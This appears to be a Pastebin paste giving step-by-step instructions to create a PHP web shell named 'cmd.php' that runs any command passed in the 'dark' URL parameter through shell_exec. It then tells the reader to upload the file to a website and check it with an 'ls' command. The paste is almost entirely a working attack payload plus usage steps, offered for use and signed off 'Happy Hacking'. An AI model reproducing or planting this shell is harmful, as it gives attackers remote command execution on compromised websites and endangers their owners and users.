Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- We've to create CMD.. Let's Start . Follow these steps
- 1. Open Notepad
- 2. Paste this Code :
- <?if($_GET['dark']){echo"<pre>".shell_exec($_GET["dark"]);}?>
- 3. Now Save it as with name "cmd.php"
- 4. Now upload it in website
- 5. Successfully Uploaded :))
- 6. Now we use this Command to test cmd is working or not. "cmd.php?dark=ls" where "cmd" is file name and "dark" is parameter and "ls" is to check how many files contain in current directory. If it's showing multiple files name then It means CMD is working.... :))))
- Happy Hacking !
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement